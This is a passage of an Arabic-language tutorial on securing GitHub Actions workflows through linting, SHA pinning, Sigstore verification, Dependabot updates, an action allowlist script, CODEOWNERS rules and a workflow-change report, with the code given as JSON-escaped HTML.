\u0627\u0644\u0645\u0647\u0645\u0644\u0629<\/td>\n<td>\u0646\u0639\u0645<\/td>\n<td>\u0644\u0627<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<p><strong>\u0627\u0644\u062a\u0648\u0635\u064a\u0629:<\/strong> \u0627\u0633\u062a\u062e\u062f\u0645 \u0643\u0644\u062a\u0627 \u0627\u0644\u0623\u062f\u0627\u062a\u064a\u0646 \u0645\u0639\u064b\u0627. \u064a\u0643\u062a\u0634\u0641 actionlint \u0645\u0634\u0627\u0643\u0644 \u0627\u0644\u0635\u062d\u0629 \u0648\u0623\u0646\u0645\u0627\u0637 \u0627\u0644\u062d\u0642\u0646 \u0627\u0644\u0623\u0633\u0627\u0633\u064a\u0629\u061b \u064a\u0648\u0641\u0631 zizmor \u062a\u062d\u0644\u064a\u0644\u0627\u064b \u0623\u0645\u0646\u064a\u064b\u0627 \u0623\u0639\u0645\u0642. \u0623\u0636\u0641 \u0643\u0644\u064a\u0647\u0645\u0627 \u0625\u0644\u0649 \u062e\u0637 \u0623\u0646\u0627\u0628\u064a\u0628 CI \u0627\u0644\u062e\u0627\u0635 \u0628\u0643:<\/p>\n<pre><code>name: Workflow Security Scan\non:\n  pull_request:\n    paths:\n      - '.github\/workflows\/**'\n\njobs:\n  scan:\n    runs-on: ubuntu-latest\n    steps:\n      - uses: actions\/checkout@b4ffde65f46336ab88eb53be808477a3936bae11 # v4\n      - name: Run actionlint\n        run: |\n          brew install actionlint\n          actionlint .github\/workflows\/*.yml\n      - name: Run zizmor\n        run: |\n          pip install zizmor\n          zizmor .github\/workflows\/<\/code><\/pre>\n<h2>\u0627\u0644\u062a\u0645\u0631\u064a\u0646 4: \u062a\u062b\u0628\u064a\u062a \u0648\u0627\u0644\u062a\u062d\u0642\u0642 \u0645\u0646 \u0633\u0644\u0627\u0645\u0629 \u0627\u0644\u0640 Actions<\/h2>\n<p>\u0627\u0644\u0645\u0631\u0627\u062c\u0639 \u0627\u0644\u0645\u0628\u0646\u064a\u0629 \u0639\u0644\u0649 \u0627\u0644\u0639\u0644\u0627\u0645\u0627\u062a \u0645\u062b\u0644 <code>@v4<\/code> \u0642\u0627\u0628\u0644\u0629 \u0644\u0644\u062a\u063a\u064a\u064a\u0631 \u2014 \u064a\u0645\u0643\u0646 \u0646\u0642\u0644 \u0627\u0644\u0639\u0644\u0627\u0645\u0629 \u0644\u0644\u0625\u0634\u0627\u0631\u0629 
\u0625\u0644\u0649 \u0623\u064a \u0627\u0644\u062a\u0632\u0627\u0645 \u0641\u064a \u0623\u064a \u0648\u0642\u062a. \u0627\u0644\u062a\u062b\u0628\u064a\u062a \u0628\u0640 SHA \u063a\u064a\u0631 \u0642\u0627\u0628\u0644 \u0644\u0644\u062a\u063a\u064a\u064a\u0631 \u0648\u064a\u0648\u0641\u0631 \u0636\u0645\u0627\u0646\u064b\u0627 \u062a\u0634\u0641\u064a\u0631\u064a\u064b\u0627 \u0628\u0623\u0646\u0643 \u062a\u0634\u063a\u0644 \u0627\u0644\u0634\u064a\u0641\u0631\u0629 \u0630\u0627\u062a\u0647\u0627 \u0627\u0644\u062a\u064a \u0631\u0627\u062c\u0639\u062a\u0647\u0627.<\/p>\n<h3>\u0627\u0644\u062e\u0637\u0648\u0629 1: \u062a\u062d\u062f\u064a\u062f SHA \u0644\u0644\u0640 Actions<\/h3>\n<p>\u0627\u0633\u062a\u062e\u062f\u0645 GitHub CLI \u0644\u062a\u062d\u062f\u064a\u062f SHA \u0627\u0644\u062d\u0627\u0644\u064a \u0644\u0643\u0644 \u0639\u0644\u0627\u0645\u0629 action:<\/p>\n<pre><code># \u062a\u062d\u062f\u064a\u062f actions\/checkout@v4\ngh api repos\/actions\/checkout\/git\/ref\/tags\/v4 --jq '.object.sha'\n# \u0627\u0644\u0645\u062e\u0631\u062c: b4ffde65f46336ab88eb53be808477a3936bae11\n\n# \u062a\u062d\u062f\u064a\u062f actions\/setup-node@v4\ngh api repos\/actions\/setup-node\/git\/ref\/tags\/v4 --jq '.object.sha'\n# \u0627\u0644\u0645\u062e\u0631\u062c: 60edb5dd545a775178f52524783378180af0d1f8\n\n# \u062a\u062d\u062f\u064a\u062f actions\/cache@v4\ngh api repos\/actions\/cache\/git\/ref\/tags\/v4 --jq '.object.sha'\n# \u0627\u0644\u0645\u062e\u0631\u062c: 0c45773b623bea8c8e75f6c82b208c3cf94d9d67<\/code><\/pre>\n<p><strong>\u0645\u0647\u0645:<\/strong> \u0628\u0639\u0636 \u0627\u0644\u0639\u0644\u0627\u0645\u0627\u062a \u062a\u0634\u064a\u0631 \u0625\u0644\u0649 \u0643\u0627\u0626\u0646\u0627\u062a \u0639\u0644\u0627\u0645\u0627\u062a \u0645\u064f\u0639\u0644\u0651\u0642\u0629 \u0628\u062f\u0644\u0627\u064b \u0645\u0646 \u0627\u0644\u0627\u0644\u062a\u0632\u0627\u0645\u0627\u062a \u0645\u0628\u0627\u0634\u0631\u0629. 
\u0641\u064a \u0647\u0630\u0647 \u0627\u0644\u062d\u0627\u0644\u0629\u060c \u062a\u062d\u062a\u0627\u062c \u0625\u0644\u0649 \u0625\u0644\u063a\u0627\u0621 \u0645\u0631\u062c\u0639 \u0627\u0644\u0639\u0644\u0627\u0645\u0629:<\/p>\n<pre><code># \u0625\u0630\u0627 \u0623\u0631\u062c\u0639 \u0627\u0644\u0623\u0645\u0631 \u0623\u0639\u0644\u0627\u0647 \u0643\u0627\u0626\u0646 \u0645\u0646 \u0646\u0648\u0639 'tag'\u060c \u0642\u0645 \u0628\u0625\u0644\u063a\u0627\u0621 \u0627\u0644\u0645\u0631\u062c\u0639:\ngh api repos\/actions\/checkout\/git\/ref\/tags\/v4 --jq '.object' \n# \u0625\u0630\u0627 \u0643\u0627\u0646 \u0627\u0644\u0646\u0648\u0639 \"tag\"\u060c \u0627\u062d\u0635\u0644 \u0639\u0644\u0649 \u0627\u0644\u0627\u0644\u062a\u0632\u0627\u0645 \u0627\u0644\u0623\u0633\u0627\u0633\u064a:\ngh api repos\/actions\/checkout\/git\/tags\/TAG_SHA --jq '.object.sha'<\/code><\/pre>\n<h3>\u0627\u0644\u062e\u0637\u0648\u0629 2: \u062a\u062d\u062f\u064a\u062b \u0645\u0633\u0627\u0631 \u0627\u0644\u0639\u0645\u0644<\/h3>\n<p>\u0627\u0633\u062a\u0628\u062f\u0644 \u0645\u0631\u0627\u062c\u0639 \u0627\u0644\u0639\u0644\u0627\u0645\u0627\u062a \u0628\u062a\u062b\u0628\u064a\u062a SHA. 
\u0623\u0636\u0641 \u062f\u0627\u0626\u0645\u064b\u0627 \u062a\u0639\u0644\u064a\u0642\u064b\u0627 \u0628\u0627\u0644\u0639\u0644\u0627\u0645\u0629 \u0627\u0644\u0623\u0635\u0644\u064a\u0629 \u0644\u0633\u0647\u0648\u0644\u0629 \u0627\u0644\u0642\u0631\u0627\u0621\u0629:<\/p>\n<pre><code>steps:\n  - uses: actions\/checkout@b4ffde65f46336ab88eb53be808477a3936bae11 # v4\n  - uses: actions\/setup-node@60edb5dd545a775178f52524783378180af0d1f8 # v4\n    with:\n      node-version: '20'\n  - uses: actions\/cache@0c45773b623bea8c8e75f6c82b208c3cf94d9d67 # v4\n    with:\n      path: ~\/.npm\n      key: ${{ runner.os }}-npm-${{ hashFiles('**\/package-lock.json') }}<\/code><\/pre>\n<h3>\u0627\u0644\u062e\u0637\u0648\u0629 3: \u0627\u0644\u062a\u062d\u0642\u0642 \u0645\u0646 \u062a\u0648\u0642\u064a\u0639\u0627\u062a Sigstore (\u0639\u0646\u062f \u062a\u0648\u0641\u0631\u0647\u0627)<\/h3>\n<p>\u0628\u0639\u0636 \u0646\u0627\u0634\u0631\u064a \u0627\u0644\u0640 actions \u064a\u0648\u0642\u0639\u0648\u0646 \u0625\u0635\u062f\u0627\u0631\u0627\u062a\u0647\u0645 \u0628\u0627\u0633\u062a\u062e\u062f\u0627\u0645 Sigstore. 
\u064a\u0645\u0643\u0646\u0643 \u0627\u0644\u062a\u062d\u0642\u0642 \u0645\u0646 \u0647\u0630\u0647 \u0627\u0644\u062a\u0648\u0642\u064a\u0639\u0627\u062a:<\/p>\n<pre><code># \u062a\u062b\u0628\u064a\u062a cosign\nbrew install cosign\n\n# \u0627\u0644\u062a\u062d\u0642\u0642 \u0645\u0646 \u0625\u0635\u062f\u0627\u0631 action \u0645\u0648\u0642\u0639 (\u0625\u0630\u0627 \u0643\u0627\u0646 \u0627\u0644\u0646\u0627\u0634\u0631 \u064a\u0648\u0642\u0639\u0647\u0627)\ncosign verify-blob \\\n  --certificate-identity \"https:\/\/github.com\/actions\/checkout\/.github\/workflows\/release.yml@refs\/tags\/v4\" \\\n  --certificate-oidc-issuer \"https:\/\/token.actions.githubusercontent.com\" \\\n  --bundle checkout-v4.sigstore.json \\\n  checkout-v4.tar.gz<\/code><\/pre>\n<p>\u0644\u064a\u0633\u062a \u0643\u0644 \u0627\u0644\u0640 actions \u062a\u0646\u0634\u0631 \u062a\u0648\u0642\u064a\u0639\u0627\u062a Sigstore \u0628\u0639\u062f\u060c \u0644\u0643\u0646 \u0647\u0630\u0647 \u0645\u0645\u0627\u0631\u0633\u0629 \u0646\u0627\u0634\u0626\u0629.<\/p>\n<h3>\u0627\u0644\u062e\u0637\u0648\u0629 4: \u0625\u0639\u062f\u0627\u062f Dependabot \u0644\u062a\u062d\u062f\u064a\u062b\u0627\u062a SHA \u0627\u0644\u0622\u0644\u064a\u0629<\/h3>\n<p>\u0627\u0644\u062a\u062b\u0628\u064a\u062a \u0628\u0640 SHA \u064a\u0639\u0646\u064a \u0623\u0646\u0643 \u0644\u0646 \u062a\u062d\u0635\u0644 \u0639\u0644\u0649 \u0627\u0644\u062a\u062d\u062f\u064a\u062b\u0627\u062a \u062a\u0644\u0642\u0627\u0626\u064a\u064b\u0627. 
\u0627\u0633\u062a\u062e\u062f\u0645 Dependabot \u0644\u0623\u062a\u0645\u062a\u0629 \u0630\u0644\u0643 \u0645\u0639 \u0627\u0644\u062d\u0641\u0627\u0638 \u0639\u0644\u0649 \u0639\u062f\u0645 \u0627\u0644\u0642\u0627\u0628\u0644\u064a\u0629 \u0644\u0644\u062a\u063a\u064a\u064a\u0631:<\/p>\n<p>\u0623\u0646\u0634\u0626 <code>.github\/dependabot.yml<\/code>:<\/p>\n<pre><code>version: 2\nupdates:\n  - package-ecosystem: \"github-actions\"\n    directory: \"\/\"\n    schedule:\n      interval: \"weekly\"\n      day: \"monday\"\n    open-pull-requests-limit: 10\n    labels:\n      - \"dependencies\"\n      - \"github-actions\"\n    reviewers:\n      - \"your-security-team\"\n    commit-message:\n      prefix: \"chore(deps)\"<\/code><\/pre>\n<p>\u0639\u0646\u062f\u0645\u0627 \u064a\u062a\u0645 \u0625\u0635\u062f\u0627\u0631 \u0646\u0633\u062e\u0629 \u062c\u062f\u064a\u062f\u0629 \u0645\u0646 action\u060c \u0633\u064a\u0646\u0634\u0626 Dependabot \u0637\u0644\u0628 PR \u064a\u062d\u062f\u0651\u062b \u062a\u062b\u0628\u064a\u062a SHA:<\/p>\n<pre><code># \u0645\u062b\u0627\u0644 \u0639\u0644\u0649 \u0641\u0631\u0642 PR \u0645\u0646 Dependabot:\n- uses: actions\/checkout@b4ffde65f46336ab88eb53be808477a3936bae11 # v4.1.1\n+ uses: actions\/checkout@8ade135a41bc03ea155e62e844d188df1ea18608 # v4.1.2<\/code><\/pre>\n<p>\u0647\u0630\u0627 \u064a\u0645\u0646\u062d\u0643 \u0623\u0641\u0636\u0644 \u0645\u0627 \u0641\u064a \u0627\u0644\u0639\u0627\u0644\u0645\u064a\u0646: \u0645\u0631\u0627\u062c\u0639 \u063a\u064a\u0631 \u0642\u0627\u0628\u0644\u0629 \u0644\u0644\u062a\u063a\u064a\u064a\u0631 \u0645\u0639 \u062a\u062d\u062f\u064a\u062b\u0627\u062a \u0622\u0644\u064a\u0629 \u062a\u0645\u0631 \u0639\u0628\u0631 \u0639\u0645\u0644\u064a\u0629 \u0645\u0631\u0627\u062c\u0639\u0629 PR \u0627\u0644\u0639\u0627\u062f\u064a\u0629.<\/p>\n<h2>\u0627\u0644\u062a\u0645\u0631\u064a\u0646 5: \u0641\u0631\u0636 \u0642\u0627\u0626\u0645\u0629 \u0628\u064a\u0636\u0627\u0621 \u0644\u0644\u0640 
Actions<\/h2>\n<p>\u062d\u062a\u0649 \u0645\u0639 \u0627\u0644\u062a\u062b\u0628\u064a\u062a \u0648\u0627\u0644\u0641\u062d\u0635\u060c \u062a\u062d\u062a\u0627\u062c \u0625\u0644\u0649 \u0622\u0644\u064a\u0629 \u0644\u0645\u0646\u0639 \u0627\u0644\u0640 actions \u063a\u064a\u0631 \u0627\u0644\u0645\u0639\u062a\u0645\u062f\u0629 \u0645\u0646 \u0627\u0644\u0625\u0636\u0627\u0641\u0629 \u0625\u0644\u0649 \u0645\u0633\u0627\u0631\u0627\u062a \u0627\u0644\u0639\u0645\u0644. \u062a\u0636\u0645\u0646 \u0627\u0644\u0642\u0627\u0626\u0645\u0629 \u0627\u0644\u0628\u064a\u0636\u0627\u0621 \u0623\u0646 \u0627\u0644\u0640 actions \u0627\u0644\u0645\u064f\u062f\u0642\u0642\u0629 \u0641\u0642\u0637 \u064a\u0645\u0643\u0646 \u0627\u0633\u062a\u062e\u062f\u0627\u0645\u0647\u0627.<\/p>\n<h3>\u0627\u0644\u062e\u064a\u0627\u0631 \u0623: GitHub Enterprise \u2014 \u0642\u0627\u0626\u0645\u0629 \u0628\u064a\u0636\u0627\u0621 \u0639\u0644\u0649 \u0645\u0633\u062a\u0648\u0649 \u0627\u0644\u0645\u0646\u0638\u0645\u0629<\/h3>\n<p>\u0625\u0630\u0627 \u0643\u0646\u062a \u062a\u0633\u062a\u062e\u062f\u0645 GitHub Enterprise\u060c \u064a\u0645\u0643\u0646\u0643 \u062a\u0642\u064a\u064a\u062f \u0627\u0644\u0640 actions \u0639\u0644\u0649 \u0645\u0633\u062a\u0648\u0649 \u0627\u0644\u0645\u0646\u0638\u0645\u0629:<\/p>\n<ol>\n<li>\u0627\u0630\u0647\u0628 \u0625\u0644\u0649 <strong>\u0625\u0639\u062f\u0627\u062f\u0627\u062a \u0627\u0644\u0645\u0646\u0638\u0645\u0629<\/strong><\/li>\n<li>\u0627\u0646\u062a\u0642\u0644 \u0625\u0644\u0649 <strong>Actions &rarr; General<\/strong><\/li>\n<li>\u062a\u062d\u062a <strong>\u0627\u0644\u0633\u064a\u0627\u0633\u0627\u062a<\/strong>\u060c \u0627\u062e\u062a\u0631 <strong>\u0627\u0644\u0633\u0645\u0627\u062d \u0644\u0640 actions \u0648\u0645\u0633\u0627\u0631\u0627\u062a \u0627\u0644\u0639\u0645\u0644 \u0627\u0644\u0642\u0627\u0628\u0644\u0629 \u0644\u0625\u0639\u0627\u062f\u0629 \u0627\u0644\u0627\u0633\u062a\u062e\u062f\u0627\u0645 
\u0627\u0644\u0645\u062d\u062f\u062f\u0629<\/strong><\/li>\n<li>\u0623\u0636\u0641 \u0627\u0644\u0640 actions \u0627\u0644\u0645\u0639\u062a\u0645\u062f\u0629: <code>actions\/checkout@*<\/code>\u060c <code>actions\/setup-node@*<\/code>\u060c \u0625\u0644\u062e.<\/li>\n<\/ol>\n<p>\u0647\u0630\u0627 \u0647\u0648 \u0623\u0642\u0648\u0649 \u062a\u0637\u0628\u064a\u0642 \u0644\u0623\u0646 GitHub \u0646\u0641\u0633\u0647 \u0633\u064a\u0631\u0641\u0636 \u062a\u0634\u063a\u064a\u0644 \u0645\u0633\u0627\u0631\u0627\u062a \u0627\u0644\u0639\u0645\u0644 \u0627\u0644\u062a\u064a \u062a\u0633\u062a\u062e\u062f\u0645 actions \u063a\u064a\u0631 \u0645\u0633\u0645\u0648\u062d \u0628\u0647\u0627.<\/p>\n<h3>\u0627\u0644\u062e\u064a\u0627\u0631 \u0628: \u0641\u062d\u0635 \u0627\u0644\u0642\u0627\u0626\u0645\u0629 \u0627\u0644\u0628\u064a\u0636\u0627\u0621 \u0627\u0644\u0645\u0628\u0646\u064a \u0639\u0644\u0649 CI<\/h3>\n<p>\u0644\u0644\u0645\u0646\u0638\u0645\u0627\u062a \u0628\u062f\u0648\u0646 GitHub Enterprise\u060c \u064a\u0645\u0643\u0646\u0643 \u0625\u0646\u0634\u0627\u0621 \u0622\u0644\u064a\u0629 \u062a\u0637\u0628\u064a\u0642 \u0645\u0628\u0646\u064a\u0629 \u0639\u0644\u0649 CI.<\/p>\n<p><strong>\u0627\u0644\u062e\u0637\u0648\u0629 1: \u0625\u0646\u0634\u0627\u0621 \u0627\u0644\u0642\u0627\u0626\u0645\u0629 \u0627\u0644\u0628\u064a\u0636\u0627\u0621.<\/strong><\/p>\n<p>\u0623\u0646\u0634\u0626 <code>allowed-actions.txt<\/code> \u0641\u064a \u062c\u0630\u0631 \u0645\u0633\u062a\u0648\u062f\u0639\u0643:<\/p>\n<pre><code># GitHub Actions \u0627\u0644\u0645\u0639\u062a\u0645\u062f\u0629\n# \u0627\u0644\u0635\u064a\u063a\u0629: owner\/repo\n# \u0627\u0644\u0623\u0633\u0637\u0631 \u0627\u0644\u062a\u064a \u062a\u0628\u062f\u0623 \u0628\u0640 # \u0647\u064a \u062a\u0639\u0644\u064a\u0642\u0627\u062a\n\n# Actions \u0627\u0644\u0631\u0633\u0645\u064a\u0629 \u0645\u0646 
GitHub\nactions\/checkout\nactions\/setup-node\nactions\/cache\nactions\/upload-artifact\nactions\/download-artifact\nactions\/github-script\n\n# \u0641\u062d\u0635 \u0627\u0644\u0623\u0645\u0627\u0646\ngithub\/codeql-action\n\n# \u0623\u0637\u0631\u0627\u0641 \u062b\u0627\u0644\u062b\u0629 \u0645\u0639\u062a\u0645\u062f\u0629\ndocker\/build-push-action\ndocker\/login-action<\/code><\/pre>\n<p><strong>\u0627\u0644\u062e\u0637\u0648\u0629 2: \u0625\u0646\u0634\u0627\u0621 \u0633\u0643\u0631\u064a\u0628\u062a \u0627\u0644\u062a\u062d\u0642\u0642.<\/strong><\/p>\n<p>\u0623\u0646\u0634\u0626 <code>scripts\/check-actions.sh<\/code>:<\/p>\n<pre><code>#!\/bin\/bash\nset -euo pipefail\n\nALLOWLIST=\"allowed-actions.txt\"\nWORKFLOW_DIR=\".github\/workflows\"\nFAILED=0\n\nif [[ ! -f \"$ALLOWLIST\" ]]; then\n  echo \"ERROR: Allowlist file not found: $ALLOWLIST\"\n  exit 1\nfi\n\n# \u0627\u0633\u062a\u062e\u0631\u0627\u062c \u062c\u0645\u064a\u0639 \u0645\u0631\u0627\u062c\u0639 'uses:' \u0645\u0646 \u0645\u0644\u0641\u0627\u062a \u0645\u0633\u0627\u0631\u0627\u062a \u0627\u0644\u0639\u0645\u0644\necho \"Scanning workflow files for action references...\"\necho \"================================================\"\n\nfor workflow in \"$WORKFLOW_DIR\"\/*.yml \"$WORKFLOW_DIR\"\/*.yaml; do\n  [[ -f \"$workflow\" ]] || continue\n  \n  echo \"\"\n  echo \"Checking: $workflow\"\n  \n  # \u0627\u0633\u062a\u062e\u0631\u0627\u062c \u0645\u0631\u0627\u062c\u0639 \u0627\u0644\u0640 actions (owner\/repo \u0645\u0646 uses: owner\/repo@ref)\n  actions=$(grep -oP 'uses:\\s+\\K[^@\\s]+' \"$workflow\" | \\\n    grep '\/' | \\\n    grep -v '^\\.\\.\/\\|^docker:\/\/' | \\\n    sort -u)\n  \n  for action in $actions; do\n    if grep -qx \"$action\" \"$ALLOWLIST\"; then\n      echo \"  \u2713 $action (approved)\"\n    else\n      echo \"  \u2717 $action (NOT IN ALLOWLIST)\"\n      FAILED=1\n    fi\n  done\ndone\n\necho \"\"\necho \"================================================\"\nif [[ $FAILED 
-eq 1 ]]; then\n  echo \"FAILED: Unapproved actions detected!\"\n  echo \"To approve a new action, add it to $ALLOWLIST and get security team review.\"\n  exit 1\nelse\n  echo \"PASSED: All actions are approved.\"\nfi<\/code><\/pre>\n<p>\u0627\u062c\u0639\u0644 \u0627\u0644\u0633\u0643\u0631\u064a\u0628\u062a \u0642\u0627\u0628\u0644\u0627\u064b \u0644\u0644\u062a\u0646\u0641\u064a\u0630:<\/p>\n<pre><code>chmod +x scripts\/check-actions.sh<\/code><\/pre>\n<p><strong>\u0627\u0644\u062e\u0637\u0648\u0629 3: \u0625\u0646\u0634\u0627\u0621 \u0645\u0633\u0627\u0631 \u0639\u0645\u0644 \u0627\u0644\u062a\u0637\u0628\u064a\u0642.<\/strong><\/p>\n<p>\u0623\u0646\u0634\u0626 <code>.github\/workflows\/check-actions.yml<\/code>:<\/p>\n<pre><code>name: Action Allowlist Check\non:\n  pull_request:\n    paths:\n      - '.github\/workflows\/**'\n      - 'allowed-actions.txt'\n\npermissions:\n  contents: read\n\njobs:\n  check-actions:\n    runs-on: ubuntu-latest\n    steps:\n      - uses: actions\/checkout@b4ffde65f46336ab88eb53be808477a3936bae11 # v4\n\n      - name: Check actions against allowlist\n        run: .\/scripts\/check-actions.sh<\/code><\/pre>\n<p><strong>\u0627\u0644\u062e\u0637\u0648\u0629 4: \u0627\u062e\u062a\u0628\u0627\u0631 \u0627\u0644\u062a\u0637\u0628\u064a\u0642.<\/strong><\/p>\n<p>\u0623\u0636\u0641 action \u063a\u064a\u0631 \u0645\u0639\u062a\u0645\u062f\u0629 \u0625\u0644\u0649 \u0645\u0633\u0627\u0631 \u0639\u0645\u0644 \u0641\u064a \u0641\u0631\u0639 \u0648\u0627\u0641\u062a\u062d PR:<\/p>\n<pre><code># \u0641\u064a \u0641\u0631\u0639 \u062c\u062f\u064a\u062f\u060c \u0623\u0636\u0641 action \u063a\u064a\u0631 \u0645\u0639\u062a\u0645\u062f\u0629\ngit checkout -b test-unapproved-action\n\n# \u0623\u0636\u0641 action \u063a\u064a\u0631 \u0645\u0639\u062a\u0645\u062f\u0629 \u0625\u0644\u0649 ci.yml\n# \u0645\u062b\u0644\u0627\u064b\u060c uses: some-unknown\/action@v1\n\ngit add .github\/workflows\/ci.yml\ngit commit -m \"test: add unapproved action\"\ngit 
push origin test-unapproved-action\n# \u0627\u0641\u062a\u062d PR \u2192 \u0648\u0638\u064a\u0641\u0629 check-actions \u0633\u062a\u0641\u0634\u0644<\/code><\/pre>\n<p>\u0633\u062a\u0638\u0647\u0631 \u0627\u0644\u0645\u062e\u0631\u062c\u0627\u062a:<\/p>\n<pre><code>Checking: .github\/workflows\/ci.yml\n  \u2713 actions\/checkout (approved)\n  \u2713 actions\/setup-node (approved)\n  \u2713 actions\/cache (approved)\n  \u2717 some-unknown\/action (NOT IN ALLOWLIST)\n\n================================================\nFAILED: Unapproved actions detected!\nTo approve a new action, add it to allowed-actions.txt and get security team review.<\/code><\/pre>\n<p>\u0627\u062c\u0639\u0644 \u0647\u0630\u0627 \u0641\u062d\u0635 \u062d\u0627\u0644\u0629 \u0645\u0637\u0644\u0648\u0628 \u0641\u064a \u0642\u0648\u0627\u0639\u062f \u062d\u0645\u0627\u064a\u0629 \u0627\u0644\u0641\u0631\u0639 \u0644\u0641\u0631\u0636 \u0627\u0644\u0642\u0627\u0626\u0645\u0629 \u0627\u0644\u0628\u064a\u0636\u0627\u0621 \u0639\u0644\u0649 \u062c\u0645\u064a\u0639 \u0637\u0644\u0628\u0627\u062a PR.<\/p>\n<h2>\u0627\u0644\u062a\u0645\u0631\u064a\u0646 6: \u0645\u0631\u0627\u0642\u0628\u0629 \u062a\u063a\u064a\u064a\u0631\u0627\u062a \u0627\u0644\u0640 Actions<\/h2>\n<p>\u062d\u062a\u0649 \u0645\u0639 \u0627\u0644\u0642\u0648\u0627\u0626\u0645 \u0627\u0644\u0628\u064a\u0636\u0627\u0621 \u0648\u0627\u0644\u062a\u062b\u0628\u064a\u062a\u060c \u062a\u062d\u062a\u0627\u062c \u0625\u0644\u0649 \u0631\u0624\u064a\u0629 \u062d\u0648\u0644 \u0645\u062a\u0649 \u062a\u062a\u063a\u064a\u0631 \u0645\u0644\u0641\u0627\u062a \u0645\u0633\u0627\u0631\u0627\u062a \u0627\u0644\u0639\u0645\u0644. 
\u0647\u0630\u0627 \u0627\u0644\u062a\u0645\u0631\u064a\u0646 \u064a\u064f\u0639\u062f\u0651 \u0622\u0644\u064a\u0627\u062a \u0627\u0644\u0645\u0631\u0627\u0642\u0628\u0629 \u0648\u0627\u0644\u062a\u0646\u0628\u064a\u0647.<\/p>\n<h3>\u0627\u0644\u062e\u0637\u0648\u0629 1: \u0625\u0639\u062f\u0627\u062f CODEOWNERS<\/h3>\n<p>\u0623\u0646\u0634\u0626 <code>.github\/CODEOWNERS<\/code> \u0644\u0637\u0644\u0628 \u0645\u0631\u0627\u062c\u0639\u0629 \u0641\u0631\u064a\u0642 \u0627\u0644\u0623\u0645\u0627\u0646 \u0644\u062a\u063a\u064a\u064a\u0631\u0627\u062a \u0645\u0633\u0627\u0631\u0627\u062a \u0627\u0644\u0639\u0645\u0644:<\/p>\n<pre><code># \u0637\u0644\u0628 \u0645\u0631\u0627\u062c\u0639\u0629 \u0641\u0631\u064a\u0642 \u0627\u0644\u0623\u0645\u0627\u0646 \u0644\u062c\u0645\u064a\u0639 \u062a\u063a\u064a\u064a\u0631\u0627\u062a \u0645\u0633\u0627\u0631\u0627\u062a \u0627\u0644\u0639\u0645\u0644\n.github\/workflows\/ @your-org\/security-team\n.github\/actions\/    @your-org\/security-team\nallowed-actions.txt @your-org\/security-team\n.github\/dependabot.yml @your-org\/security-team<\/code><\/pre>\n<p>\u0641\u0639\u0651\u0644 \u0642\u0627\u0639\u062f\u0629 \u062d\u0645\u0627\u064a\u0629 \u0627\u0644\u0641\u0631\u0639 &#8220;\u0637\u0644\u0628 \u0627\u0644\u0645\u0631\u0627\u062c\u0639\u0629 \u0645\u0646 \u0645\u0627\u0644\u0643\u064a \u0627\u0644\u0634\u064a\u0641\u0631\u0629&#8221; \u0644\u0641\u0631\u0636 \u0630\u0644\u0643.<\/p>\n<h3>\u0627\u0644\u062e\u0637\u0648\u0629 2: \u0625\u0646\u0634\u0627\u0621 \u0645\u064f\u0628\u0644\u0651\u063a \u062a\u063a\u064a\u064a\u0631\u0627\u062a \u0645\u0633\u0627\u0631\u0627\u062a \u0627\u0644\u0639\u0645\u0644<\/h3>\n<p>\u0623\u0646\u0634\u0626 \u0645\u0633\u0627\u0631 \u0639\u0645\u0644 \u064a\u0639\u0644\u0651\u0642 \u062a\u0644\u0642\u0627\u0626\u064a\u064b\u0627 \u0639\u0644\u0649 \u0637\u0644\u0628\u0627\u062a PR \u0628\u0645\u0644\u062e\u0635 \u062a\u063a\u064a\u064a\u0631\u0627\u062a \u0627\u0644\u0640 
actions:<\/p>\n<pre><code>name: Workflow Change Report\non:\n  pull_request:\n    paths:\n      - '.github\/workflows\/**'\n\npermissions:\n  contents: read\n  pull-requests: write\n\njobs:\n  report:\n    runs-on: ubuntu-latest\n    steps:\n      - uses: actions\/checkout@b4ffde65f46336ab88eb53be808477a3936bae11 # v4\n        with:\n          fetch-depth: 0\n\n      - name: Generate action change report\n        id: report\n        run: |\n          BASE=${{ github.event.pull_request.base.sha }}\n          HEAD=${{ github.event.pull_request.head.sha }}\n\n          echo \"## Workflow Changes Report\" > \/tmp\/report.md\n          echo \"\" >> \/tmp\/report.md\n\n          # \u0627\u0644\u0628\u062d\u062b \u0639\u0646 \u0645\u0644\u0641\u0627\u062a \u0645\u0633\u0627\u0631\u0627\u062a \u0627\u0644\u0639\u0645\u0644 \u0627\u0644\u0645\u064f\u0639\u062f\u0651\u0644\u0629\n          CHANGED_FILES=$(git diff --name-only \"$BASE\"..\"$HEAD\" -- .github\/workflows\/)\n\n          if [[ -z \"$CHANGED_FILES\" ]]; then\n            echo \"No workflow files changed.\" >> \/tmp\/report.md\n            exit 0\n          fi\n\n          echo \"### Changed Files\" >> \/tmp\/report.md\n          for file in $CHANGED_FILES; do\n            echo \"- \\`$file\\`\" >> \/tmp\/report.md\n          done\n          echo \"\" >> \/tmp\/report.md\n\n          # \u0627\u0633\u062a\u062e\u0631\u0627\u062c \u062a\u063a\u064a\u064a\u0631\u0627\u062a \u0627\u0644\u0640 actions\n          echo \"### Action Reference Changes\" >> \/tmp\/report.md\n          echo '```diff' >> \/tmp\/report.md\n          git diff \"$BASE\"..\"$HEAD\" -- .github\/workflows\/ | \\\n            grep -E '^[+-].*uses:' | \\\n            grep -v '^[+-]{3}' >> \/tmp\/report.md || true\n          echo '```' >> \/tmp\/report.md\n          echo \"\" >> \/tmp\/report.md\n          echo \"\u26a0\ufe0f **Security team review required for workflow changes.**\" >> \/tmp\/report.md\n\n      - name: Comment on PR\n        uses: 
actions\/github-script@60a0d83039c74a4aee543508d2ffcb1c3799cdea # v7\n        with:\n          script: |\n            const fs = require('fs');\n            const report = fs.readFileSync('\/tmp\/report.md', 'utf8');\n            await github.rest.issues.createComment({\n              owner: context.repo.owner,\n              repo: context.repo.repo,\n              issue_number: context.issue.number,\n              body: report\n            });<\/code><\/pre>\n<h3>\u0627\u0644\u062e\u0637\u0648\u0629 3: \u0627\u0644\u0627\u0633\u062a\u0641\u0627\u062f\u0629 \u0645\u0646 \u062a\u0646\u0628\u064a\u0647\u0627\u062a Dependabot \u0627\u0644\u0623\u0645\u0646\u064a\u0629<\/h3>\n<p>\u064a\u064f\u0628\u0644\u0651\u063a Dependabot \u062a\u0644\u0642\u0627\u0626\u064a\u064b\u0627 \u0639\u0646 \u0627\u0644\u062b\u063a\u0631\u0627\u062a \u0627\u0644\u0645\u0639\u0631\u0648\u0641\u0629 \u0641\u064a GitHub Actions. \u062a\u0623\u0643\u062f \u0645\u0646 \u062a\u0641\u0639\u064a\u0644 